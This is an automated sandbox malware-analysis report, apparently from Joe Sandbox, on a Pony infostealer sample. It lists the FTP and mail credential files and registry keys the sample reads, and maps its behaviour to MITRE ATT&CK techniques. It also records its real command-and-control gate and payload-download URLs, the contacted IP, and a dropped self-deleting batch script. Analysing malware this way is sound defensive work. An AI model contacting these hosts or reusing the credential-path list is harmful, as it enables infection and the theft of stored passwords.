Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	File opened: C:\ProgramData\GlobalSCAPE\CuteFTP\sm.dat	Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	File opened: C:\ProgramData\FlashFXP\3\Quick.dat	Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	File opened: C:\Users\user\AppData\Local\FTPRush\	Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	File opened: C:\ProgramData\Estsoft\ALFTP\	Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	File opened: C:\ProgramData\GlobalSCAPE\CuteFTP Pro\sm.dat	Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	File opened: C:\ProgramData\ExpanDrive\drives.js	Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	File opened: C:\ProgramData\CuteFTP\sm.dat	Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	File opened: C:\Program Files (x86)\GlobalSCAPE\CuteFTP\sm.dat	Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	File opened: C:\Users\user\AppData\Local\CoffeeCup Software\SharedSettings_1_0_5.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	File opened: C:\Program Files (x86)\GlobalSCAPE\CuteFTP\	Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	File opened: C:\Users\user\AppData\Local\FlashFXP\4\Quick.dat	Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	File opened: C:\Users\user\AppData\Roaming\GlobalSCAPE\CuteFTP\sm.dat	Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	File opened: C:\Users\user\AppData\Local\GPSoftware\Directory Opus\	Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	File opened: C:\ProgramData\FlashFXP\3\Sites.dat	Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	File opened: C:\Users\user\AppData\Local\GlobalSCAPE\CuteFTP\	Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	File opened: HKEY_CURRENT_USER\Software\Far\Plugins\FTP\Hosts	Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	File opened: C:\Users\user\AppData\Roaming\SharedSettings_1_0_5.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	File opened: C:\Users\user\AppData\Local\FileZilla\sitemanager.xml	Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	File opened: C:\Users\user\AppData\Local\BlazeFtp\	Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	File opened: C:\Users\user\AppData\Roaming\GlobalSCAPE\CuteFTP Lite\	Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	File opened: C:\Users\user\AppData\Local\GlobalSCAPE\CuteFTP Lite\sm.dat	Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	File opened: HKEY_CURRENT_USER\Software\GlobalSCAPE\CuteFTP 8 Home\QCToolbar	Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	File opened: HKEY_CURRENT_USER\Software\GlobalSCAPE\CuteFTP 7 Professional\QCToolbar	Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	File opened: C:\Users\user\AppData\Local\FTPGetter\	Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	File opened: C:\ProgramData\SharedSettings.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	File opened: C:\ProgramData\AceBIT\	Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	File opened: C:\ProgramData\GlobalSCAPE\CuteFTP\	Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	File opened: C:\Users\user\AppData\Roaming\FTPRush\	Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	File opened: C:\ProgramData\CoffeeCup Software\SharedSettings_1_0_5.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	File opened: C:\Users\user\AppData\Local\GHISLER\wcx_ftp.ini	Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	File opened: C:\Windows\32BitFtp.ini	Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	File opened: C:\Program Files (x86)\GlobalSCAPE\CuteFTP Pro\sm.dat	Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	File opened: C:\Users\user\AppData\Local\LeapWare\LeapFTP\	Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	File opened: C:\Users\user\AppData\Roaming\INSoftware\NovaFTP\	Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	File opened: C:\Program Files (x86)\GlobalSCAPE\CuteFTP Lite\	Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	File opened: C:\ProgramData\FlashFXP\4\Quick.dat	Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	File opened: C:\Users\user\AppData\Local\GlobalSCAPE\CuteFTP Lite\	Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	File opened: C:\Users\user\AppData\Roaming\FileZilla\sitemanager.xml	Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	File opened: C:\ProgramData\3D-FTP\	Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	File opened: C:\Users\user\AppData\Local\Frigate3\	Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	File opened: C:\ProgramData\NetSarang\	Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	File opened: HKEY_CURRENT_USER\Software\GlobalSCAPE\CuteFTP 6 Home\QCToolbar	Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	File opened: C:\Users\user\AppData\Roaming\GPSoftware\Directory Opus\	Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	File opened: C:\ProgramData\FTPRush\	Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	File opened: HKEY_CURRENT_USER\Software\GlobalSCAPE\CuteFTP 8 Professional\QCToolbar	Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	File opened: C:\ProgramData\GlobalSCAPE\CuteFTP Lite\sm.dat	Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	File opened: C:\Users\user\AppData\Local\SharedSettings.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	File opened: C:\ProgramData\FlashFXP\3\History.dat	Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	File opened: C:\Users\user\AppData\Roaming\FlashFXP\4\Sites.dat	Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	File opened: HKEY_LOCAL_MACHINE\Software\TurboFTP	Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	File opened: C:\Users\user\AppData\Roaming\FlashFXP\3\Quick.dat	Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	File opened: C:\ProgramData\FlashFXP\4\History.dat	Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	File opened: C:\ProgramData\CoffeeCup Software\SharedSettings_1_0_5.ccs	Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	File opened: C:\Windows\wcx_ftp.ini	Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	File opened: C:\Program Files (x86)\GlobalSCAPE\CuteFTP Lite\sm.dat	Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	File opened: C:\Users\user\AppData\Roaming\CoffeeCup Software\SharedSettings_1_0_5.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	File opened: C:\Users\user\AppData\Roaming\RhinoSoft.com\	Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	File opened: C:\Users\user\AppData\Roaming\CuteFTP\sm.dat	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail	Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail	Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts	Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Microsoft Outlook Internet Settings	Jump to behavior
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook	Jump to behavior

Tries to steal Mail credentials (via file registry)

Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	Code function: RegOpenKeyA,RegEnumKeyExA,RegCloseKey, PopPassword		1_2_0040EBA3
Source: C:\Users\user\Desktop\BW38j8Jkbl.exe	Code function: RegOpenKeyA,RegEnumKeyExA,RegCloseKey, SmtpPassword		1_2_0040EBA3

Remote Access Functionality

Source: Yara match	File source: 1.2.BW38j8Jkbl.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.BW38j8Jkbl.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.BW38j8Jkbl.exe.4296000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000001.00000002.1811123790.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1787368894.0000000004296000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: BW38j8Jkbl.exe PID: 7132, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: BW38j8Jkbl.exe PID: 5904, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	1 Scripting	1 Valid Accounts	1 Native API	1 Valid Accounts	1 Valid Accounts	1 Valid Accounts	2 OS Credential Dumping	1 Security Software Discovery	Remote Services	1 Email Collection	22 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	1 Scripting	11 Access Token Manipulation	11 Access Token Manipulation	2 Credentials in Registry	1 Process Discovery	Remote Desktop Protocol	1 Archive Collected Data	1 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	1 DLL Side-Loading	11 Process Injection	11 Process Injection	Security Account Manager	1 Account Discovery	SMB/Windows Admin Shares	2 Data from Local System	2 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	1 DLL Side-Loading	1 Deobfuscate/Decode Files or Information	NTDS	1 System Owner/User Discovery	Distributed Component Object Model	Input Capture	113 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	2 Obfuscated Files or Information	LSA Secrets	3 File and Directory Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Install Root Certificate	Cached Domain Credentials	14 System Information Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 Software Packing	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 DLL Side-Loading	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label
BW38j8Jkbl.exe	79%	ReversingLabs	Win32.Infostealer.PonyStealer
BW38j8Jkbl.exe	100%	Avira	HEUR/AGEN.1335971
BW38j8Jkbl.exe	100%	Joe Sandbox ML

Dropped Files

⊘No Antivirus matches

Unpacked PE Files

⊘No Antivirus matches

Domains

⊘No Antivirus matches

URLs

Source	Detection	Scanner	Label
http://www.ibsensoftware.com/	0%	URL Reputation	safe
http://https://ftp://operawand.dat_Software	0%	Avira URL Cloud	safe
http://smartoffice-eg.com/include/rili/gate.phphttp://smartoffice-eg.com/include/rili/shit.exeYUIPWD	0%	Avira URL Cloud	safe
http://smartoffice-eg.com/include/rili/gate.php	0%	Avira URL Cloud	safe
ftp://http://https://ftp.fireFTPsites.datSeaMonkey	0%	Avira URL Cloud	safe
http://smartoffice-eg.com/include/rili/shit.exe	0%	Avira URL Cloud	safe
https://smartoffice-eg.com/include/rili/shit.exe	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
smartoffice-eg.com	144.76.41.117	true	true		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://smartoffice-eg.com/include/rili/shit.exe	true	Avira URL Cloud: safe	unknown
http://smartoffice-eg.com/include/rili/gate.php	true	Avira URL Cloud: safe	unknown
https://smartoffice-eg.com/include/rili/shit.exe	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://https://ftp://operawand.dat_Software	BW38j8Jkbl.exe, 00000000.00000002.1787368894.0000000004296000.00000040.00001000.00020000.00000000.sdmp, BW38j8Jkbl.exe, 00000001.00000002.1811123790.0000000000400000.00000040.00000400.00020000.00000000.sdmp	false	Avira URL Cloud: safe	low
https://ac.ecosia.org/autocomplete?q=	BW38j8Jkbl.exe, 00000001.00000003.1791093260.000000000069A000.00000004.00000020.00020000.00000000.sdmp	false		high
https://duckduckgo.com/chrome_newtab	BW38j8Jkbl.exe, 00000001.00000003.1791093260.000000000069A000.00000004.00000020.00020000.00000000.sdmp	false		high
http://smartoffice-eg.com/include/rili/gate.phphttp://smartoffice-eg.com/include/rili/shit.exeYUIPWD	BW38j8Jkbl.exe, 00000000.00000002.1787368894.0000000004296000.00000040.00001000.00020000.00000000.sdmp, BW38j8Jkbl.exe, 00000001.00000002.1811123790.0000000000400000.00000040.00000400.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://duckduckgo.com/ac/?q=	BW38j8Jkbl.exe, 00000001.00000003.1791093260.000000000069A000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	BW38j8Jkbl.exe, 00000001.00000003.1791093260.000000000069A000.00000004.00000020.00020000.00000000.sdmp	false		high
ftp://http://https://ftp.fireFTPsites.datSeaMonkey	BW38j8Jkbl.exe, 00000000.00000002.1787368894.0000000004296000.00000040.00001000.00020000.00000000.sdmp, BW38j8Jkbl.exe, 00000001.00000002.1811123790.0000000000400000.00000040.00000400.00020000.00000000.sdmp	false	Avira URL Cloud: safe	low
http://www.ibsensoftware.com/	BW38j8Jkbl.exe, BW38j8Jkbl.exe, 00000001.00000002.1811123790.0000000000400000.00000040.00000400.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	BW38j8Jkbl.exe, 00000001.00000003.1791093260.000000000069A000.00000004.00000020.00020000.00000000.sdmp	false		high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	BW38j8Jkbl.exe, 00000001.00000003.1791093260.000000000069A000.00000004.00000020.00020000.00000000.sdmp	false		high
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	BW38j8Jkbl.exe, 00000001.00000003.1791093260.000000000069A000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.ecosia.org/newtab/	BW38j8Jkbl.exe, 00000001.00000003.1791093260.000000000069A000.00000004.00000020.00020000.00000000.sdmp	false		high
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	BW38j8Jkbl.exe, 00000001.00000003.1791093260.000000000069A000.00000004.00000020.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
144.76.41.117	smartoffice-eg.com	Germany		24940	HETZNER-ASDE	true

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1430559
Start date and time:	2024-04-23 21:46:26 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 2m 57s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	4
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	BW38j8Jkbl.exe renamed because original name is a hash value
Original Sample Name:	2392a10406f41b602acbbdbbb24e0ff7.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@7/1@1/1
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 96% Number of executed functions: 96 Number of non-executed functions: 46
Cookbook Comments:	Found application associated with file extension: .exe Stop behavior analysis, all processes terminated

Warnings

Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.
VT rate limit hit for: BW38j8Jkbl.exe

Simulations

Behavior and APIs

⊘No simulations

Joe Sandbox View / Context

IPs

⊘No context

Domains

⊘No context

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
HETZNER-ASDE	https://webmail.cmxserver.com/authsecure/index.php?email=kaylen@virtualintelligencebriefing.com	Get hash	malicious	Unknown	Browse	136.243.80.35
	file.exe	Get hash	malicious	Vidar	Browse	95.217.244.99
	#4711 Cotizaci#U00f3n.exe	Get hash	malicious	AgentTesla	Browse	94.130.55.203
	https://go-g3t-msg.com/clk/a_OsB_gBHRWO62vTWAvzpOfGhlvCmgnqQuB_nVFpwp0KsQNH4MVSSKRIuzJYdR_BaVVJ5ZUVsLA7nr4fsUb6_LUiF6WGpw3bjwuz5vIgSMwTtrE34sfAdm_UkarEQxhut5pfRW1RXCEHttsR2H4S_hK5eTdM2QP7CpynnqXHAbBrQcsZM-9kqSh5d_nLiZhEZPZ8-fFHjtAo-IjMx8qNxpwUaG3dVXhIP_Sup8raijFjXrg2qZL33tH_5PvkpDXJwZtdK-fqRvdTEjPP1v26xG4zHKIduU5irbL6N1Be1W_4vpi6D3s8twjJ8VAELgUZErAiigzfRVU0knOdQpcprkwW48npT3pYYpFqQU_lE9JBwESVd70JOVQuZWj_0cT7YVVRRta1y8F8vjFBDtNL73BXlqjP5sWlGZtuOnQDJ-iEKMXGy1W4uSrGBn5j07qBR3I1glqsVkAz7msz4iUFsVZ76hS_yvRcDNZBMYnXgKJRgA1A2nVJ9rwv5a55G82GhCYmOQvkUs0eG7vFHjr8gNQtxUn0q5LeVhTPJbym_uRj-gxiLJDjsLnSJXJ4eGtDvxVqhkaqM2P03jYs6BzR_fyd4ak2ZNKBm4FiGWKP44e6keEO2eNlfhZPBYG9OMlI3UM7jaU5YayqoO3Z	Get hash	malicious	Unknown	Browse	178.63.248.54
	file.exe	Get hash	malicious	Vidar	Browse	95.217.9.149
	https://www.sushi-idea.com/	Get hash	malicious	Unknown	Browse	168.119.90.21
	BitTorrent-7.6.exe	Get hash	malicious	Unknown	Browse	49.12.86.202
	BitTorrent-7.6.exe	Get hash	malicious	Unknown	Browse	168.119.13.211
	scripttodo.ps1	Get hash	malicious	Unknown	Browse	46.4.134.23
	scripttodo.ps1	Get hash	malicious	Unknown	Browse	46.4.134.23

JA3 Fingerprints

⊘No context

Dropped Files

⊘No context

Created / dropped Files

C:\Users\user\AppData\Local\Temp\6000093.bat

Download File

Process:	C:\Users\user\Desktop\BW38j8Jkbl.exe
File Type:	ASCII text, with CRLF, CR line terminators
Category:	dropped
Size (bytes):	94
Entropy (8bit):	3.233204299824007
Encrypted:	false
SSDEEP:	3:k4Zoa5/kFWJFFN6dAFZkMFlGl/AVFn:k/0/kFY/NDFZotwFn
MD5:	3880EEB1C736D853EB13B44898B718AB
SHA1:	4EEC9D50360CD815211E3C4E6BDD08271B6EC8E6
SHA-256:	936D9411D5226B7C5A150ECAF422987590A8870C8E095E1CAA072273041A86E7
SHA-512:	3EAA3DDDD7A11942E75ACD44208FBE3D3FF8F4006951CD970FB9AB748C160739409803450D28037E577443504707FC310C634E9DC54D0C25E8CFE6094F017C6B
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	......... :ktk ...... del . %1 ...if .. exist . %1 . goto .. ktk.. del . %0

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	6.271103985166775
TrID:	Win32 Executable (generic) a (10002005/4) 99.15% Win32 Executable Microsoft Visual Basic 6 (82127/2) 0.81% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	BW38j8Jkbl.exe
File size:	634'880 bytes
MD5:	2392a10406f41b602acbbdbbb24e0ff7
SHA1:	9428ec3da5621a909d6cfc52ce3c6297aa97e8bb
SHA256:	b593466df2eb855e58671d6f361c691e4be0f638f1fa17166965e613927684ea
SHA512:	ebd2dc640e1d71a80ebff12219d2e5e335b44ee856144ca83768a286380988432084250aee2a4f4dca8b075e5199e322fd83b6629e70393d1937da07acc14e45
SSDEEP:	6144:60HpX48DnabDczb+x44J8B6jUIMLhTlN1UqCzH7R:jF5Wb4zb74J86jUIMLhZzv2
TLSH:	CFD43AAA95E38A66C57013B6473A3FA098371D6BC588EA3FA050F4F3574EC614A07FD1
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........,..SM..SM..SM...Q..RM...o..UM..ek..RM..RichSM..................PE..L....b.Z.................p...@....................@........

File Icon


Icon Hash:	2c58a6a5300b0503

Static PE Info

General

Entrypoint:	0x4012b0
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
DLL Characteristics:
Time Stamp:	0x5AE962D7 [Wed May 2 07:03:51 2018 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	d0fc2e651b4758ccb12e19df8df46000

Entrypoint Preview

Instruction
push 00401408h
call 00007F1E34DC7C65h
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
xor byte ptr [eax], al
add byte ptr [eax], al
cmp byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add al, 35h
leave
ret
inc edx
pop edx
jnl 00007F1E34DC7CC0h
mov ebp, 618D87FDh
pop ebp
mov esi, 00000089h
add byte ptr [eax], al
add byte ptr [ecx], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax+6Fh], cl
jc 00007F1E34DC7CE0h
je 00007F1E34DC7CA8h
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [edi], al
add byte ptr [eax], al
add al, al
sbb eax, 00070040h
add byte ptr [eax], al
push 0700401Dh
add byte ptr [eax], al
add byte ptr [eax], al
sbb eax, 00070040h
add byte ptr [eax], al
cwde
sbb al, 40h
add byte ptr [ecx], al
add byte ptr [4018B400h], al
add byte ptr [eax], al
add byte ptr [eax], al
add bh, bh

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x97494	0x28	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x9a000	0x1ce0	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x230	0x20
IMAGE_DIRECTORY_ENTRY_IAT	0x1000	0x104	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x96944	0x97000	8a80ace0a11c67f29cc3158706c36cd1	False	0.3374961196192053	data	6.350406111571056	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.data	0x98000	0x1348	0x1000	620f0b67a91f7f74151bc5be745b7110	False	0.00634765625	data	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x9a000	0x1ce0	0x2000	fb2105c4b567090f2a330495ce781db3	False	0.490966796875	data	4.451310478564093	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0x9b438	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 1152			0.7373646209386282
RT_ICON	0x9a790	0xca8	Device independent bitmap graphic, 32 x 64 x 24, image size 3200			0.5070987654320988
RT_ICON	0x9a428	0x368	Device independent bitmap graphic, 16 x 32 x 24, image size 832			0.5573394495412844
RT_GROUP_ICON	0x9a3f8	0x30	data			0.9583333333333334
RT_VERSION	0x9a150	0x2a8	data	English	United States	0.5058823529411764

Imports

DLL

Import

MSVBVM60.DLL

_CIcos, _adj_fptan, __vbaVarMove, __vbaFreeVar, __vbaFreeVarList, _adj_fdiv_m64, _adj_fprem1, __vbaSetSystemError, __vbaHresultCheckObj, _adj_fdiv_m32, __vbaObjSet, __vbaCyAdd, _adj_fdiv_m16i, __vbaObjSetAddref, _adj_fdivr_m16i, _CIsin, __vbaChkstk, EVENT_SINK_AddRef, __vbaCyI4, __vbaObjVar, DllFunctionCall, _adj_fpatan, EVENT_SINK_Release, _CIsqrt, EVENT_SINK_QueryInterface, __vbaVarMul, __vbaFpCmpCy, __vbaExceptHandler, _adj_fprem, _adj_fdivr_m64, __vbaFPException, __vbaUbound, _CIlog, __vbaNew2, _adj_fdiv_m32i, _adj_fdivr_m32i, __vbaStrCopy, __vbaFreeStrList, _adj_fdivr_m32, _adj_fdiv_r, __vbaVarTstNe, __vbaI4Var, __vbaInStrB, __vbaVarAdd, __vbaLateMemCall, __vbaStrComp, __vbaLateMemCallLd, __vbaVarSetObjAddref, _CIatan, __vbaStrMove, _allmul, _CItan, _CIexp, __vbaFreeStr, __vbaFreeObj

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
04/23/24-21:47:30.497908	TCP	2014562	ET TROJAN Pony Downloader HTTP Library MSIE 5 Win98	49730	80	192.168.2.4	144.76.41.117

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Apr 23, 2024 21:47:30.288014889 CEST	49730	80	192.168.2.4	144.76.41.117
Apr 23, 2024 21:47:30.497503042 CEST	80	49730	144.76.41.117	192.168.2.4
Apr 23, 2024 21:47:30.497715950 CEST	49730	80	192.168.2.4	144.76.41.117
Apr 23, 2024 21:47:30.497908115 CEST	49730	80	192.168.2.4	144.76.41.117
Apr 23, 2024 21:47:30.706665993 CEST	80	49730	144.76.41.117	192.168.2.4
